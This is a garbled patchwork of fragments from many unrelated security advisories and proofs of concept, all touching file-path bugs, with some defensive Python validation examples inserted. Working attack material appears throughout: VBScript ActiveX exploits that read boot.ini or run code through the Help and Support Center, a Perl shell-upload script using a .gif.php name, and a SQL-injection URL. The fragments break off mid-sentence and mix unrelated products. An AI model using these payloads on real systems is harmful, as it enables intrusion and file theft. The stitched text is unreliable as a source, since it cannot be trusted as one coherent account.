file path
A stopgap patch was made that tries to neutralize these two bugs. The
included patch applies the first two recommended actions for the
escalation bug. It also destroys the session data, but does not completely
destroy the session itself. It also modifies the filter to block the
second attack. However, it will also modify any legitimate file path
that contains two consecutive dots.
This patch can be applied to any installed bytehoard 2.1/epsilon. It
should be installed by running "patch -p1 < PATCH-NAME" in the document
root (where index.php lies).
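The caveat above (a filter that strips every ".." also breaks legitimate names such as "report..v2.txt") is the usual reason dot-stripping is the wrong primitive for traversal defence. The following is an added example, not code from bytehoard or from the stopgap patch, contrasting the stripping approach with canonicalise-then-check; DOCROOT is a hypothetical document root chosen for the example.

```python
import posixpath
from urllib.parse import unquote

# Hypothetical document root for the example; a real install would use its own.
DOCROOT = "/var/www/bytehoard/files"


def naive_filter(user_path: str) -> str:
    """Mimics the stopgap: delete every '..' sequence.

    This stops '../' traversal but also corrupts legitimate names that
    happen to contain two consecutive dots.
    """
    return user_path.replace("..", "")


def safe_join(root: str, user_path: str):
    """Resolve user_path relative to root and refuse anything that escapes root.

    Returns the canonical path, or None if the request must be rejected.
    Canonicalising first means a legitimate 'a..b' name survives untouched.
    """
    decoded = unquote(user_path)                 # fold %2e%2e and similar encodings
    if "\x00" in decoded:                        # NUL truncates paths in C runtimes
        return None
    decoded = decoded.replace("\\", "/")         # backslash is a separator on Windows
    root = posixpath.normpath(root)
    candidate = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    if candidate != root and not candidate.startswith(root + "/"):
        return None
    return candidate


if __name__ == "__main__":
    for p in ("report..v2.txt", "../../etc/passwd", "%2e%2e/%2e%2e/etc/passwd"):
        print(repr(p), "->", repr(naive_filter(p)), "|", repr(safe_join(DOCROOT, p)))
```

The check compares the normalised result against the root prefix rather than inspecting the input string, so encoded dots, backslashes and a leading slash are all handled by the same line, and a file name that merely contains ".." is left alone.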
> .....data
> [MakeFiles]
> 5=CRC Check.exe
> [MakeDef]
> Menu=1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0
> 1=4,O,$B\RC.EXE /v,1 <==Command Execution by replacing the original file path with the command
> 2=3,O,$B\ML.EXE /c /coff /Cp /nologo /I"$I",2 <==Command Execution by replacing the original file path with the command
> 3=5,O,$B\LINK.EXE /SUBSYSTEM:WINDOWS /RELEASE /VERSION:4.0 /LIBPATH:"$L" /OUT:"$5",3,4 <==Command Execution by replacing the original file path with the command
> 4=0,0,,5
> 5=rsrc.obj,O,$B\CVTRES.EXE,rsrc.res <==Command Execution by replacing the original file path with the command
> 7=0,0,"$E\OllyDbg",5
tmpdir = e_mkdtemp("tnef-attachment-XXXXXX");
if (tmpdir == NULL)
return;
filepath = tmpdir;
name = g_build_filename(tmpdir, ".evo-attachment.tnef",
NULL);
out = camel_stream_fs_new_with_name(name, O_RDWR|O_CREAT, 0666);
{
    $_NOW = IPSDebug::getMemoryDebugFlag();

    $module = ipsRegistry::$current_module;
    $section = ipsRegistry::$current_section;
    $filepath = IPSLib::getAppDir( IPS_APP_COMPONENT ) . '/' . self::$modules_dir . '/' . $module . '/';

    /* Got a section? */
    if ( ! $section )
    {
Release Type: Co-ordinated, responsible disclosure
2. Vulnerability Information
------------------------------------------------------------------------------------------------------------------------
Class: Cross Site Request Forgery, Cross Site Scripting, File Path
Disclosure, Local File Inclusion, Authentication Bypass and PHP Command
Injection
Remotely Exploitable: Yes
Locally Exploitable: No
2. Vulnerability Information
----------------------------------------------------------------------------------------------
Class: SQL Injection, Insecure File Upload, Cross Site Scripting,
Filepath Disclosure
Remotely Exploitable: Yes
Locally Exploitable: No
3. Vulnerability Description
handle certain utf8 characters in regular expressions. If a user or
automated system were tricked into using a specially crafted expression,
a remote attacker could crash the application, leading to a denial
of service. Ubuntu 8.10 was not affected by this issue. (CVE-2008-1927)
A race condition was discovered in the File::Path Perl module's rmtree
function. If a local attacker successfully raced another user's call
of rmtree, they could create arbitrary setuid binaries. Ubuntu 6.06
and 8.10 were not affected by this issue. (CVE-2008-5302)
A race condition was discovered in the File::Path Perl module's rmtree
{
/* method RefreshAddRemovePrograms */
}
/* DISPID=14 */
function ShellExec(
/* VT_BSTR [8] [in] */ $FilePath,
/* VT_BSTR [8] [in] */ $Params
)
{
/* method ShellExec */
}
original one: http://retrogod.altervista.org/9sg_CA_poc.html
-->
<html><object classid='clsid:F13D3742-6C4F-4915-BF91-784BA02DD0BE' id='UmxEventCliLib'/>
</object><script language='vbscript'>
filePath="..\..\..\..\..\..\..\boot.ini"
UmxEventCliLib.SaveToFile filePath
</script></html>
It's possible to view any file on the server because Virtualmin doesn't drop
root privileges to perform some of its actions.
Example:
Use the "Execute SQL" feature in the mysql module by passing
"/etc/master.passwd" parameter as the file path to the .sql file:
-- cut --
Output from SQL commands in file /etc/master.passwd ..
ERROR 1064 (42000) at line 3: You have an error in your SQL syntax;
check the manual that corresponds to your MySQL server version for the
POC:
========
Function WriteTextFile (
ByVal str As Variant ,
ByVal FilePath As Variant
) As String
0:000> g
(d2c.f84): Unknown exception - code 0eedfade (first chance)
The RSS module allows SugarCRM users to add RSS feeds to their personal
RSS list. The application expects a URL value pointing to a valid RSS
feed.
However, the URL parameter value is not properly sanitised and any URI
value can be entered instead. In this particular case, it was discovered
that it is possible to enter a file path to any file on the local
system hosting the SugarCRM application.
As a result, SugarCRM does not display the new RSS feed in the list, as it
is not a valid RSS feed URL. However, the application creates a local
file with the filename of the md5 hash of the URL entered. The file is
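The defect described above is that the feed parameter is accepted as any URI at all, including a bare local file path. The following is an added example, not SugarCRM code, of the check a feed-subscription handler should apply before fetching: only absolute http(s) URLs with a host are accepted, and literal non-global addresses are refused so the fetcher cannot be pointed at loopback or internal hosts either. The function name and return convention are the example's own; checking DNS resolution results is left out.

```python
import ipaddress
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def feed_url_problem(value: str):
    """Return None if value is an acceptable remote feed URL, else a short reason.

    Rejects local file paths (no scheme), file:/php:/ftp: and similar schemes,
    URLs without a host, and literal IP addresses that are not globally routable.
    A DNS name is accepted here; a resolution-time check would be a separate step.
    """
    parts = urlsplit(value.strip())
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        # Covers '/etc/passwd' (empty scheme), 'file:///etc/passwd' and
        # 'C:\boot.ini', which urlsplit reads as scheme 'c'.
        return "scheme not http(s)"
    host = parts.hostname
    if not host:
        return "no host"
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return None            # a DNS name, not a literal address
    if not ip.is_global:
        return "non-global address"
    return None


if __name__ == "__main__":
    for u in ("http://example.com/rss.xml", "/etc/passwd",
              "file:///etc/passwd", "http://127.0.0.1/rss"):
        print(repr(u), "->", feed_url_problem(u))
```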
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request::Common;

my $ua = LWP::UserAgent->new;
# Multipart upload: the file body is read from the local path given as the
# first array element and sent under the name 1.gif.php with an image/gif
# Content-Type, which is what the upload handler trusts.
my $res = $ua->request(POST 'http://www.example.com/[sitexs]/adm/visual/upload.php',
    Content_Type => 'form-data',
    Content => [
        UPLOAD => ["Your shell file path", "1.gif.php", "Content-Type" => "image/gif"],
        submit => 'true', type => 'images', path => '', process => 'true',
    ],
);
print $res->as_string();
-----------------------------------------------------------------------------------
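The upload above succeeds because the handler trusts the client-supplied Content-Type and does not reject a ".php" segment in the file name. The following is an added example, not code from the affected application, of the server-side check that defeats it: the client content type is ignored entirely, every extension segment of the name must be on the allowlist (so both "1.gif.php" and "x.php.gif" are refused), and the body must start with the magic bytes of the claimed type. MAGIC and the function name are the example's own.

```python
import os

# Magic bytes for the image types this hypothetical gallery accepts.
# The keys are the only extensions permitted anywhere in a file name.
MAGIC = {
    "gif": (b"GIF87a", b"GIF89a"),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
}


def upload_problem(filename: str, content: bytes):
    """Return None if the upload may be stored, else a short rejection reason.

    The client-supplied Content-Type is deliberately not a parameter: it is
    attacker-controlled and must not influence the decision.
    """
    name = os.path.basename(filename.replace("\\", "/"))
    if not name or name.startswith(".") or "\x00" in name:
        return "bad name"
    parts = name.lower().split(".")
    if len(parts) < 2:
        return "no extension"
    # Every extension segment must be allowed, not just the last one: with an
    # AddHandler-style server configuration a name like x.php.gif can still be
    # handed to the PHP interpreter.
    exts = parts[1:]
    if any(e not in MAGIC for e in exts):
        return "extension not allowed"
    if not content.startswith(MAGIC[exts[-1]]):
        return "content does not match extension"
    return None


if __name__ == "__main__":
    # Constructed sample bodies: a minimal GIF header and a PHP payload.
    gif = b"GIF89a\x01\x00\x01\x00"
    php = b"<?php system($_GET['c']); ?>"
    for fname, body in (("1.gif.php", php), ("1.gif", php), ("1.gif", gif)):
        print(fname, "->", upload_problem(fname, body))
```

Storing the file under a server-generated name in a directory the web server will not execute from is the second half of the defence; this check only decides whether the upload is accepted at all.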
*7240 : execute "write" a:file
4. Footnotes
[1] Really a URL -- local file path without a scheme is a special case; we
haven't explored remote issues, but they might be interesting.
[2] shellescape() was introduced in patch 7.0.111, and is not used at all as
of version 7.1.298. Naive quoting is being used instead, throughout the
code. A typical example from the ``netrwFileHandlers.vim'' file:
Ganeti, an open source virtualisation manager, suffers from an input
validation bug that poses a security risk.
The vulnerability applies to the commands submitted, either locally via
gnt-* commands or remotely via the HTTP API, to the machine acting as a
cluster master. Validation for a file path argument is missing resulting
in arbitrary code execution, local exploitation applies to any user with
rights to execute ganeti commands while remote exploitation applies to
configured users authenticated over the ganeti RAPI.
While the local exploitation is a non-issue for the root user, which can
Normally the value of "target" can only be set to the three values
above; any other value is filtered.
Nevertheless, the parameter injection vulnerability allows the value
of "target" to be set arbitrarily. If the value is a valid file path,
Akamai Download Manager will download the target file directly to it
without any interaction with the user. As a result, attackers can
construct a malicious web page that downloads a file to any location
of their choosing on the user's system.
Hello BugtraQ, I tried to reproduce this advisory,
and found out that it's impossible.
When you create an index.php file executing admin.template_engine.php,
this index.php contains
require_once("lib/template.class.php");
but this is the wrong file path, and executing index.php stops with the error
Warning: require_once(./lib/template.class.php)
Fatal error: require_once().
Good Luck.
The above code comes from /admin/plog-themes.php @ lines 40-57 and
shows a possible avenue for attackers to use in order to update the
'theme_dir' in the database. The only trick to this is that we have to make
the "activate" parameter pass both the file_exists() check and the
basename() check, and still have it update the 'theme_dir' data in
the database with our arbitrary file path.
/admin/plog-themes.php?activate=%00', `theme_dir` = concat
(feed_title,char(0)) -- *
The above url will successfully copy the data that is contained
Description
===========
Mozilla discovered that Opera does not handle input to file form fields
properly, allowing scripts to manipulate the file path (CVE-2008-1080).
Max Leonov found out that image comments might be treated as scripts,
and run within the wrong security context (CVE-2008-1081). Arnaud
reported that a wrong representation of DOM attribute values of
imported XML documents allows them to bypass sanitization filters
(CVE-2008-1082).
beyond the scope of this report, it is not known what web servers will
expose this vulnerability to a remote attacker.
C. Relative File Path Writing (CVE-2009-0841)
Severity: Medium/High
The "mapserv" CGI application can be tricked into creating files in
arbitrary locations in the file system with arbitrary names.
Symantec PcAnywhere version 10 – 12.5
==================================================
2) Severity Rating: Low
==================================================
3) Description of Vulnerability
A local format string vulnerability was discovered within Symantec PcAnywhere versions 10 through 12.5. The vulnerability is due to improper processing of format strings within remote control file (.CHF) names or the associated file path. When specially crafted format strings are entered as the file name (%s%s%s%s%s.chf) or within the path of the CHF file, the format string vulnerability is triggered, making it possible to read/write arbitrary memory and, at a minimum, cause a denial of service condition.
==================================================
4) Solution : Upgrade to version 12.5 SP1
==================================================
5) Time Table:
01/06/2009 Reported Vulnerability to Vendor.
<OBJECT classid='clsid:01110800-3E00-11D2-8470-0060089874ED' width=1 height=1 id='DNAEditorCtl' />
</OBJECT>
<SCRIPT language='VBScript'>
<!--
sh="<HTML><SCRIPT LANGUAGE=VBScript>" + unescape("Execute%28unescape%28%22Set%20s%3DCreateObject%28%22%22WScript.Shell%22%22%29%250D%250As.Run%20%22%22cmd%20%252fc%20start%20calc%22%22%22%29%29") + "<" + Chr(47) + "SCRIPT><" + Chr(47) + "HTML>"
'file path is injected in msinfo.htm, you can see the code by an hex editor, some limit with *number* of chars, some problem with newlines, resolved with vbscript code evaluation by Execute(), a popup says Unable to post... click Ok or close it and you are pwned
DNAEditorCtl.PackageFiles sh + "../../../../../../../../../WINDOWS/PCHEALTH/HELPCTR/System/sysinfo/msinfo.htm"
'launch the script and calc.exe trough the Help and Support Center Service
document.write("<iframe src=""hcp://system/sysinfo/msinfo.htm"">")
-->
</SCRIPT>
How to determine if the installation is affected
Locate the following file on the respective platform:
Platform: Windows
File path: "%NH_HOME%\extensions\local\42339.log"
Platform: Unix
0348FBD2 90 NOP
...
Usage: php 9sg_jetcast_poc.php
It creates 4 files on your desktop, it says which will hit the right offset on
your system (file path is important to achieve arbitrary code execution on a victim user
so an attacker should persuade him to try to stream them ...)
It works by dragging the file on it or by right clicking and selecting "Add files ...",
not 100% reliable, version specific...
-------------------------------------------------------------------------------------
*/
III. ANALYSIS
Exploitation allows attackers to read arbitrary files from the server
machine. The tftp/mftp daemon runs with SYSTEM level privileges, so any
file readable by SYSTEM with a known file path can be downloaded without
authentication.
IV. DETECTION
iDefense confirmed the existence of this vulnerability in Altiris
Exploitation allows attackers to execute arbitrary code with system
level privilege.
Exploitation requires that attackers are able to create a specially
constructed file path on the machine running the Trend Micro product.
This could be the local machine to gain SYSTEM level privileges, or
could be conducted remotely by writing a file to an accessible network
share.
IV. DETECTION